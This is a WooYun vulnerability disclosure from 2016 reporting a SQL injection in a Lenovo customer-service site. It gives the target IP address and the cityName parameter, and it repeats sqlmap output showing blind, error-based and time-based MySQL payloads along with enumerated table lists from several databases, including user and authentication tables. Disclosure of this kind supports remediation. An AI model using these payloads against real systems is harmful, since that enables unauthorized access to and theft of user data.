当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167576

漏洞标题:联想某客服站点存在SQL注入漏洞

相关厂商:联想

漏洞作者: 乐乐

提交时间:2016-01-06 10:47

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-06: 细节已通知厂商并且等待厂商处理中
2016-01-06: 厂商已经确认,细节仅向厂商公开
2016-01-16: 细节向核心白帽子及相关领域专家公开
2016-01-26: 细节向普通白帽子公开
2016-02-05: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

详细说明:

问题链接:http://123.127.225.173/getServiceStation.page?cityName=111
webserver:jetty
数据库:mysql

联想sql注入.JPG


爆表细节:
sqlmap identified the following injection point(s) with a total of 502 HTTP(s) requests:
---
Parameter: cityName (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'XPHI' FROM DUAL WHERE 5974=5974 RLIKE (SELECT (CASE WHEN (6870=6870) THEN 111 ELSE 0x28 END)))||'
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'ekXA' FROM DUAL WHERE 7609=7609 AND (SELECT 8743 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT (ELT(8743=8743,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cityName=111'||(SELECT 'ibgW' FROM DUAL WHERE 4602=4602 AND (SELECT * FROM (SELECT(SLEEP(5)))xBeU))||'
---
back-end DBMS: MySQL 5.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cityName (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'XPHI' FROM DUAL WHERE 5974=5974 RLIKE (SELECT (CASE WHEN (6870=6870) THEN 111 ELSE 0x28 END)))||'
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'ekXA' FROM DUAL WHERE 7609=7609 AND (SELECT 8743 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT (ELT(8743=8743,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cityName=111'||(SELECT 'ibgW' FROM DUAL WHERE 4602=4602 AND (SELECT * FROM (SELECT(SLEEP(5)))xBeU))||'
---
back-end DBMS: MySQL 5.0
current user: '@'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cityName (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'XPHI' FROM DUAL WHERE 5974=5974 RLIKE (SELECT (CASE WHEN (6870=6870) THEN 111 ELSE 0x28 END)))||'
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'ekXA' FROM DUAL WHERE 7609=7609 AND (SELECT 8743 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT (ELT(8743=8743,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cityName=111'||(SELECT 'ibgW' FROM DUAL WHERE 4602=4602 AND (SELECT * FROM (SELECT(SLEEP(5)))xBeU))||'
---
back-end DBMS: MySQL 5.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cityName (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'XPHI' FROM DUAL WHERE 5974=5974 RLIKE (SELECT (CASE WHEN (6870=6870) THEN 111 ELSE 0x28 END)))||'
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'ekXA' FROM DUAL WHERE 7609=7609 AND (SELECT 8743 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT (ELT(8743=8743,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cityName=111'||(SELECT 'ibgW' FROM DUAL WHERE 4602=4602 AND (SELECT * FROM (SELECT(SLEEP(5)))xBeU))||'
---
back-end DBMS: MySQL 5.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cityName (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'XPHI' FROM DUAL WHERE 5974=5974 RLIKE (SELECT (CASE WHEN (6870=6870) THEN 111 ELSE 0x28 END)))||'
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'ekXA' FROM DUAL WHERE 7609=7609 AND (SELECT 8743 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT (ELT(8743=8743,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cityName=111'||(SELECT 'ibgW' FROM DUAL WHERE 4602=4602 AND (SELECT * FROM (SELECT(SLEEP(5)))xBeU))||'
---
back-end DBMS: MySQL 5.0
Database: lenovo1
[168 tables]
+---------------------------------------+
| auth_address_restrict |
| auth_perm |
| auth_perm_cate |
| auth_perm_cate_to_perm |
| auth_role |
| auth_role_perm |
| auth_user |
| auth_user_role |
| dict_content |
| dict_name |
| kb_biz_tpl |
| kb_biz_tpl_attr |
| kb_biz_tpl_cat |
| kb_biz_tpl_cfg |
| kb_biz_tpl_cfg_attr |
| kb_biz_tpl_rdr |
| kb_cate_class |
| kb_category |
| kb_category_tag |
| kb_dim_val |
| kb_dim_val_tag |
| kb_faq |
| kb_faq_sample |
| kb_obj__obj |
| kb_obj_class |
| kb_object |
| kb_val |
| kb_wordclass |
| kb_wordclass_category |
| kb_wordclass_word |
| mat_app |
| mat_app_category |
| mat_img_mark |
| mat_material_idx |
| mat_material_tag |
| mat_material_tag_relate |
| mkt_advertise_item |
| mkt_advertise_suite |
| mkt_hot_question |
| mkt_notice |
| mkt_sign_activity |
| mkt_user_attribute |
| mkt_vote |
| mkt_vote_item |
| mkt_vote_record |
| om_feedback |
| om_instruction_rank_day |
| om_instruction_rank_month |
| om_leave_message |
| om_log_acs_detail_201501 |
| om_log_acs_detail_201503 |
| om_log_ask_detail_201501 |
| om_log_ask_detail_201503 |
| om_log_aud |
| om_log_bookmark |
| om_log_cache |
| om_log_faq_vote |
| om_log_imgtxt |
| om_log_nick_collect |
| om_log_service_detail_201501 |
| om_log_service_detail_201503 |
| om_log_session_201501 |
| om_log_session_201503 |
| om_log_system |
| om_log_user_login |
| om_report_template |
| om_unresolved_ques_day |
| om_unresolved_ques_month |
| pub_kb_attribute |
| pub_kb_attribute__attribute |
| pub_kb_baseword |
| pub_kb_cate_class |
| pub_kb_category |
| pub_kb_category_tag |
| pub_kb_class |
| pub_kb_cmchat_faq |
| pub_kb_dim |
| pub_kb_dim_tag |
| pub_kb_dim_val |
| pub_kb_dim_val_tag |
| pub_kb_faq |
| pub_kb_faq_sample |
| pub_kb_ignored_dyn_group |
| pub_kb_instruction |
| pub_kb_instruction_param |
| pub_kb_obj__obj |
| pub_kb_obj_class |
| pub_kb_object |
| pub_kb_participle |
| pub_kb_presuffix |
| pub_kb_rule |
| pub_kb_rule_sample |
| pub_kb_stopword |
| pub_kb_sysword_op |
| pub_kb_val |
| pub_kb_variable |
| pub_kb_wordclass |
| pub_kb_wordclass_category |
| pub_kb_wordclass_word |
| push_history_0 |
| push_history_1 |
| push_history_2 |
| push_history_3 |
| push_history_4 |
| push_history_5 |
| push_history_6 |
| push_history_7 |
| push_history_8 |
| push_history_9 |
| push_message |
| push_specified |
| ra_file |
| ra_file__object |
| ra_physical_file |
| rep_evaluation_day |
| rep_evaluation_hour |
| rep_evaluation_month |
| rep_faq_ranking_day |
| rep_faq_ranking_month |
| rep_logon_day |
| rep_survey_day |
| rep_survey_hour |
| rep_survey_month |
| rep_visit_hour |
| rep_visit_month |
| rm_blacklist |
| rm_emotion |
| rm_file_resource |
| rm_menuitem |
| rm_message_resource |
| rm_msgres_dimtag |
| rm_preference |
| rm_robot_account |
| rm_robot_friend_0 |
| rm_robot_friend_1 |
| rm_robot_friend_2 |
| rm_robot_friend_3 |
| rm_robot_friend_4 |
| rm_robot_friend_5 |
| rm_robot_friend_6 |
| rm_robot_friend_7 |
| rm_robot_friend_8 |
| rm_robot_friend_9 |
| rm_robot_friend_group |
| rm_robot_info |
| rm_simple_dialog |
| rm_welcome_resource |
| robot_cat |
| robotcat_knowledge |
| robotcat_result |
| rs_assist_word |
| rs_dict |
| rs_dict_item |
| rs_recog_result |
| rs_sample_category |
| rs_sample_item |
| rs_scenario |
| rs_scenario_tag |
| rs_sentence |
| rs_sentence_category |
| rs_voice_sample |
| rs_word |
| rs_wordclass_category |
| sys_notification |
| sys_temp_fbt |
| temp_word_import |
| view_push_history |
| view_robot_friend |
+---------------------------------------+
Database: robot
[332 tables]
+---------------------------------------+
| answer_info |
| article |
| article_log |
| auth_address_restrict |
| auth_perm |
| auth_perm_cate |
| auth_perm_cate_to_perm |
| auth_role |
| auth_role_perm |
| auth_user |
| auth_user_role |
| click_number |
| dict_content |
| dict_name |
| exp_acs_question |
| exp_acs_question_copy |
| exp_beauty_image |
| exp_channel_statistic |
| exp_countyesornorecord |
| exp_faq_qqhelp_count |
| exp_faq_vote_channel |
| exp_faq_vote_smarttv |
| exp_feedback |
| exp_flow_control |
| exp_flow_operate_mode |
| exp_funimage |
| exp_handsome_image |
| exp_hot_question_statistic |
| exp_joke |
| exp_joke_sex |
| exp_listenerthread |
| exp_logo_collection |
| exp_logo_collection_product |
| exp_logo_user_info |
| exp_poetry |
| exp_record_document |
| exp_record_login_user_click_no |
| exp_robot_logo |
| exp_solution |
| exp_solution_tool |
| exp_switch |
| exp_term |
| exp_term_statistic |
| exp_tool |
| exp_tools_info |
| exp_tools_info_1 |
| exp_tools_info_10 |
| exp_tools_statistic |
| exp_unsatisfy_statistic |
| exp_user_goout |
| exp_user_oper |
| exp_weibo_accesstoken |
| exp_zip_district_phonecode |
| faq_detail_tools |
| gongju_chajian |
| kb_biz_tpl |
| kb_biz_tpl_attr |
| kb_biz_tpl_cat |
| kb_biz_tpl_cfg |
| kb_biz_tpl_cfg_attr |
| kb_biz_tpl_rdr |
| kb_cate_class |
| kb_category |
| kb_category_tag |
| kb_dim_val |
| kb_dim_val_tag |
| kb_faq |
| kb_faq_sample |
| kb_obj__obj |
| kb_obj_class |
| kb_object |
| kb_val |
| kb_wordclass |
| kb_wordclass_category |
| kb_wordclass_word |
| login_user_info |
| login_user_info_copy |
| login_user_qa |
| mat_app |
| mat_app_category |
| mat_img_mark |
| mat_material_idx |
| mat_material_tag |
| mat_material_tag_relate |
| mkt_advertise_item |
| mkt_advertise_suite |
| mkt_hot_question |
| mkt_notice |
| mkt_sign_activity |
| mkt_user_attribute |
| mkt_vote |
| mkt_vote_item |
| mkt_vote_record |
| om_feedback |
| om_instruction_rank_day |
| om_instruction_rank_month |
| om_leave_message |
| om_log_acs_detail_201308 |
| om_log_acs_detail_201309 |
| om_log_acs_detail_201310 |
| om_log_acs_detail_201311 |
| om_log_acs_detail_201312 |
| om_log_acs_detail_201401 |
| om_log_acs_detail_201402 |
| om_log_acs_detail_201403 |
| om_log_acs_detail_201404 |
| om_log_acs_detail_201405 |
| om_log_acs_detail_201406 |
| om_log_acs_detail_201407 |
| om_log_acs_detail_201408 |
| om_log_acs_detail_201409 |
| om_log_acs_detail_201410 |
| om_log_acs_detail_201411 |
| om_log_acs_detail_201412 |
| om_log_acs_detail_201501 |
| om_log_acs_detail_201502 |
| om_log_acs_detail_201503 |
| om_log_acs_detail_201504 |
| om_log_acs_detail_201505 |
| om_log_acs_detail_201506 |
| om_log_acs_detail_201507 |
| om_log_acs_detail_201508 |
| om_log_acs_detail_201509 |
| om_log_acs_detail_201510 |
| om_log_acs_detail_201511 |
| om_log_acs_detail_201512 |
| om_log_acs_detail_201601 |
| om_log_ask_detail_201308 |
| om_log_ask_detail_201309 |
| om_log_ask_detail_201310 |
| om_log_ask_detail_201311 |
| om_log_ask_detail_201312 |
| om_log_ask_detail_201401 |
| om_log_ask_detail_201402 |
| om_log_ask_detail_201403 |
| om_log_ask_detail_201404 |
| om_log_ask_detail_201405 |
| om_log_ask_detail_201406 |
| om_log_ask_detail_201407 |
| om_log_ask_detail_201408 |
| om_log_ask_detail_201409 |
| om_log_ask_detail_201410 |
| om_log_ask_detail_201411 |
| om_log_ask_detail_201412 |
| om_log_ask_detail_201501 |
| om_log_ask_detail_201502 |
| om_log_ask_detail_201503 |
| om_log_ask_detail_201504 |
| om_log_ask_detail_201505 |
| om_log_ask_detail_201506 |
| om_log_ask_detail_201507 |
| om_log_ask_detail_201508 |
| om_log_ask_detail_201509 |
| om_log_ask_detail_201510 |
| om_log_ask_detail_201511 |
| om_log_ask_detail_201512 |
| om_log_ask_detail_201601 |
| om_log_aud |
| om_log_bookmark |
| om_log_cache |
| om_log_faq_vote |
| om_log_imgtxt |
| om_log_nick_collect |
| om_log_service_detail_201308 |
| om_log_service_detail_201309 |
| om_log_service_detail_201310 |
| om_log_service_detail_201311 |
| om_log_service_detail_201312 |
| om_log_service_detail_201401 |
| om_log_service_detail_201402 |
| om_log_service_detail_201403 |
| om_log_service_detail_201404 |
| om_log_service_detail_201405 |
| om_log_service_detail_201406 |
| om_log_service_detail_201407 |
| om_log_service_detail_201408 |
| om_log_service_detail_201409 |
| om_log_service_detail_201410 |
| om_log_service_detail_201411 |
| om_log_service_detail_201412 |
| om_log_service_detail_201501 |
| om_log_service_detail_201502 |
| om_log_service_detail_201503 |
| om_log_service_detail_201504 |
| om_log_service_detail_201505 |
| om_log_service_detail_201506 |
| om_log_service_detail_201507 |
| om_log_service_detail_201508 |
| om_log_service_detail_201509 |
| om_log_service_detail_201510 |
| om_log_service_detail_201511 |
| om_log_service_detail_201512 |
| om_log_service_detail_201601 |
| om_log_session_201308 |
| om_log_session_201309 |
| om_log_session_201310 |
| om_log_session_201311 |
| om_log_session_201312 |
| om_log_session_201401 |
| om_log_session_201402 |
| om_log_session_201403 |
| om_log_session_201404 |
| om_log_session_201405 |
| om_log_session_201406 |
| om_log_session_201407 |
| om_log_session_201408 |
| om_log_session_201409 |
| om_log_session_201410 |
| om_log_session_201411 |
| om_log_session_201412 |
| om_log_session_201501 |
| om_log_session_201502 |
| om_log_session_201503 |
| om_log_session_201504 |
| om_log_session_201505 |
| om_log_session_201506 |
| om_log_session_201507 |
| om_log_session_201508 |
| om_log_session_201509 |
| om_log_session_201510 |
| om_log_session_201511 |
| om_log_session_201512 |
| om_log_session_201601 |
| om_log_system |
| om_log_user_login |
| om_report_template |
| om_unresolved_ques_day |
| om_unresolved_ques_month |
| option_info |
| pub_kb_attribute |
| pub_kb_attribute__attribute |
| pub_kb_baseword |
| pub_kb_cate_class |
| pub_kb_category |
| pub_kb_category_tag |
| pub_kb_class |
| pub_kb_cmchat_faq |
| pub_kb_dim |
| pub_kb_dim_tag |
| pub_kb_dim_val |
| pub_kb_dim_val_tag |
| pub_kb_faq |
| pub_kb_faq_sample |
| pub_kb_ignored_dyn_group |
| pub_kb_instruction |
| pub_kb_instruction_param |
| pub_kb_obj__obj |
| pub_kb_obj_class |
| pub_kb_object |
| pub_kb_participle |
| pub_kb_presuffix |
| pub_kb_rule |
| pub_kb_rule_sample |
| pub_kb_stopword |
| pub_kb_sysword_op |
| pub_kb_val |
| pub_kb_wordclass |
| pub_kb_wordclass_category |
| pub_kb_wordclass_word |
| push_history_0 |
| push_history_1 |
| push_history_2 |
| push_history_3 |
| push_history_4 |
| push_history_5 |
| push_history_6 |
| push_history_7 |
| push_history_8 |
| push_history_9 |
| push_message |
| push_specified |
| question_info |
| questionnaire_info |
| questionnaire_user_info |
| ra_file |
| ra_file__object |
| ra_physical_file |
| rep_evaluation_day |
| rep_evaluation_hour |
| rep_evaluation_month |
| rep_faq_ranking_day |
| rep_faq_ranking_month |
| rep_logon_day |
| rep_survey_day |
| rep_survey_hour |
| rep_survey_month |
| rep_visit_hour |
| rep_visit_month |
| rm_blacklist |
| rm_emotion |
| rm_file_resource |
| rm_menuitem |
| rm_message_resource |
| rm_msgres_dimtag |
| rm_preference |
| rm_robot_account |
| rm_robot_friend_0 |
| rm_robot_friend_1 |
| rm_robot_friend_2 |
| rm_robot_friend_3 |
| rm_robot_friend_4 |
| rm_robot_friend_5 |
| rm_robot_friend_6 |
| rm_robot_friend_7 |
| rm_robot_friend_8 |
| rm_robot_friend_9 |
| rm_robot_friend_group |
| rm_robot_info |
| rm_simple_dialog |
| rm_welcome_resource |
| robot_cat |
| robotcat_knowledge |
| robotcat_result |
| rs_assist_word |
| rs_dict |
| rs_dict_item |
| rs_recog_result |
| rs_sample_category |
| rs_sample_item |
| rs_scenario |
| rs_scenario_tag |
| rs_sentence |
| rs_sentence_category |
| rs_voice_sample |
| rs_word |
| rs_wordclass_category |
| sys_notification |
| sys_temp_fbt |
| temp_word_import |
| tool_question_info |
| user_detail_info |
| view_robot_friend |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: mysql
[23 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------------------+

漏洞证明:

联想sql注入.JPG


爆表细节:
sqlmap identified the following injection point(s) with a total of 502 HTTP(s) requests:
---
Parameter: cityName (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'XPHI' FROM DUAL WHERE 5974=5974 RLIKE (SELECT (CASE WHEN (6870=6870) THEN 111 ELSE 0x28 END)))||'
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'ekXA' FROM DUAL WHERE 7609=7609 AND (SELECT 8743 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT (ELT(8743=8743,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cityName=111'||(SELECT 'ibgW' FROM DUAL WHERE 4602=4602 AND (SELECT * FROM (SELECT(SLEEP(5)))xBeU))||'
---
back-end DBMS: MySQL 5.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cityName (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'XPHI' FROM DUAL WHERE 5974=5974 RLIKE (SELECT (CASE WHEN (6870=6870) THEN 111 ELSE 0x28 END)))||'
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'ekXA' FROM DUAL WHERE 7609=7609 AND (SELECT 8743 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT (ELT(8743=8743,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cityName=111'||(SELECT 'ibgW' FROM DUAL WHERE 4602=4602 AND (SELECT * FROM (SELECT(SLEEP(5)))xBeU))||'
---
back-end DBMS: MySQL 5.0
current user: '@'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cityName (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'XPHI' FROM DUAL WHERE 5974=5974 RLIKE (SELECT (CASE WHEN (6870=6870) THEN 111 ELSE 0x28 END)))||'
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'ekXA' FROM DUAL WHERE 7609=7609 AND (SELECT 8743 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT (ELT(8743=8743,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cityName=111'||(SELECT 'ibgW' FROM DUAL WHERE 4602=4602 AND (SELECT * FROM (SELECT(SLEEP(5)))xBeU))||'
---
back-end DBMS: MySQL 5.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cityName (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'XPHI' FROM DUAL WHERE 5974=5974 RLIKE (SELECT (CASE WHEN (6870=6870) THEN 111 ELSE 0x28 END)))||'
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'ekXA' FROM DUAL WHERE 7609=7609 AND (SELECT 8743 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT (ELT(8743=8743,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cityName=111'||(SELECT 'ibgW' FROM DUAL WHERE 4602=4602 AND (SELECT * FROM (SELECT(SLEEP(5)))xBeU))||'
---
back-end DBMS: MySQL 5.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cityName (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'XPHI' FROM DUAL WHERE 5974=5974 RLIKE (SELECT (CASE WHEN (6870=6870) THEN 111 ELSE 0x28 END)))||'
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cityName=111'||(SELECT 'ekXA' FROM DUAL WHERE 7609=7609 AND (SELECT 8743 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT (ELT(8743=8743,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cityName=111'||(SELECT 'ibgW' FROM DUAL WHERE 4602=4602 AND (SELECT * FROM (SELECT(SLEEP(5)))xBeU))||'
---
back-end DBMS: MySQL 5.0
Database: lenovo1
[168 tables]
+---------------------------------------+
| auth_address_restrict |
| auth_perm |
| auth_perm_cate |
| auth_perm_cate_to_perm |
| auth_role |
| auth_role_perm |
| auth_user |
| auth_user_role |
| dict_content |
| dict_name |
| kb_biz_tpl |
| kb_biz_tpl_attr |
| kb_biz_tpl_cat |
| kb_biz_tpl_cfg |
| kb_biz_tpl_cfg_attr |
| kb_biz_tpl_rdr |
| kb_cate_class |
| kb_category |
| kb_category_tag |
| kb_dim_val |
| kb_dim_val_tag |
| kb_faq |
| kb_faq_sample |
| kb_obj__obj |
| kb_obj_class |
| kb_object |
| kb_val |
| kb_wordclass |
| kb_wordclass_category |
| kb_wordclass_word |
| mat_app |
| mat_app_category |
| mat_img_mark |
| mat_material_idx |
| mat_material_tag |
| mat_material_tag_relate |
| mkt_advertise_item |
| mkt_advertise_suite |
| mkt_hot_question |
| mkt_notice |
| mkt_sign_activity |
| mkt_user_attribute |
| mkt_vote |
| mkt_vote_item |
| mkt_vote_record |
| om_feedback |
| om_instruction_rank_day |
| om_instruction_rank_month |
| om_leave_message |
| om_log_acs_detail_201501 |
| om_log_acs_detail_201503 |
| om_log_ask_detail_201501 |
| om_log_ask_detail_201503 |
| om_log_aud |
| om_log_bookmark |
| om_log_cache |
| om_log_faq_vote |
| om_log_imgtxt |
| om_log_nick_collect |
| om_log_service_detail_201501 |
| om_log_service_detail_201503 |
| om_log_session_201501 |
| om_log_session_201503 |
| om_log_system |
| om_log_user_login |
| om_report_template |
| om_unresolved_ques_day |
| om_unresolved_ques_month |
| pub_kb_attribute |
| pub_kb_attribute__attribute |
| pub_kb_baseword |
| pub_kb_cate_class |
| pub_kb_category |
| pub_kb_category_tag |
| pub_kb_class |
| pub_kb_cmchat_faq |
| pub_kb_dim |
| pub_kb_dim_tag |
| pub_kb_dim_val |
| pub_kb_dim_val_tag |
| pub_kb_faq |
| pub_kb_faq_sample |
| pub_kb_ignored_dyn_group |
| pub_kb_instruction |
| pub_kb_instruction_param |
| pub_kb_obj__obj |
| pub_kb_obj_class |
| pub_kb_object |
| pub_kb_participle |
| pub_kb_presuffix |
| pub_kb_rule |
| pub_kb_rule_sample |
| pub_kb_stopword |
| pub_kb_sysword_op |
| pub_kb_val |
| pub_kb_variable |
| pub_kb_wordclass |
| pub_kb_wordclass_category |
| pub_kb_wordclass_word |
| push_history_0 |
| push_history_1 |
| push_history_2 |
| push_history_3 |
| push_history_4 |
| push_history_5 |
| push_history_6 |
| push_history_7 |
| push_history_8 |
| push_history_9 |
| push_message |
| push_specified |
| ra_file |
| ra_file__object |
| ra_physical_file |
| rep_evaluation_day |
| rep_evaluation_hour |
| rep_evaluation_month |
| rep_faq_ranking_day |
| rep_faq_ranking_month |
| rep_logon_day |
| rep_survey_day |
| rep_survey_hour |
| rep_survey_month |
| rep_visit_hour |
| rep_visit_month |
| rm_blacklist |
| rm_emotion |
| rm_file_resource |
| rm_menuitem |
| rm_message_resource |
| rm_msgres_dimtag |
| rm_preference |
| rm_robot_account |
| rm_robot_friend_0 |
| rm_robot_friend_1 |
| rm_robot_friend_2 |
| rm_robot_friend_3 |
| rm_robot_friend_4 |
| rm_robot_friend_5 |
| rm_robot_friend_6 |
| rm_robot_friend_7 |
| rm_robot_friend_8 |
| rm_robot_friend_9 |
| rm_robot_friend_group |
| rm_robot_info |
| rm_simple_dialog |
| rm_welcome_resource |
| robot_cat |
| robotcat_knowledge |
| robotcat_result |
| rs_assist_word |
| rs_dict |
| rs_dict_item |
| rs_recog_result |
| rs_sample_category |
| rs_sample_item |
| rs_scenario |
| rs_scenario_tag |
| rs_sentence |
| rs_sentence_category |
| rs_voice_sample |
| rs_word |
| rs_wordclass_category |
| sys_notification |
| sys_temp_fbt |
| temp_word_import |
| view_push_history |
| view_robot_friend |
+---------------------------------------+
Database: robot
[332 tables]
+---------------------------------------+
| answer_info |
| article |
| article_log |
| auth_address_restrict |
| auth_perm |
| auth_perm_cate |
| auth_perm_cate_to_perm |
| auth_role |
| auth_role_perm |
| auth_user |
| auth_user_role |
| click_number |
| dict_content |
| dict_name |
| exp_acs_question |
| exp_acs_question_copy |
| exp_beauty_image |
| exp_channel_statistic |
| exp_countyesornorecord |
| exp_faq_qqhelp_count |
| exp_faq_vote_channel |
| exp_faq_vote_smarttv |
| exp_feedback |
| exp_flow_control |
| exp_flow_operate_mode |
| exp_funimage |
| exp_handsome_image |
| exp_hot_question_statistic |
| exp_joke |
| exp_joke_sex |
| exp_listenerthread |
| exp_logo_collection |
| exp_logo_collection_product |
| exp_logo_user_info |
| exp_poetry |
| exp_record_document |
| exp_record_login_user_click_no |
| exp_robot_logo |
| exp_solution |
| exp_solution_tool |
| exp_switch |
| exp_term |
| exp_term_statistic |
| exp_tool |
| exp_tools_info |
| exp_tools_info_1 |
| exp_tools_info_10 |
| exp_tools_statistic |
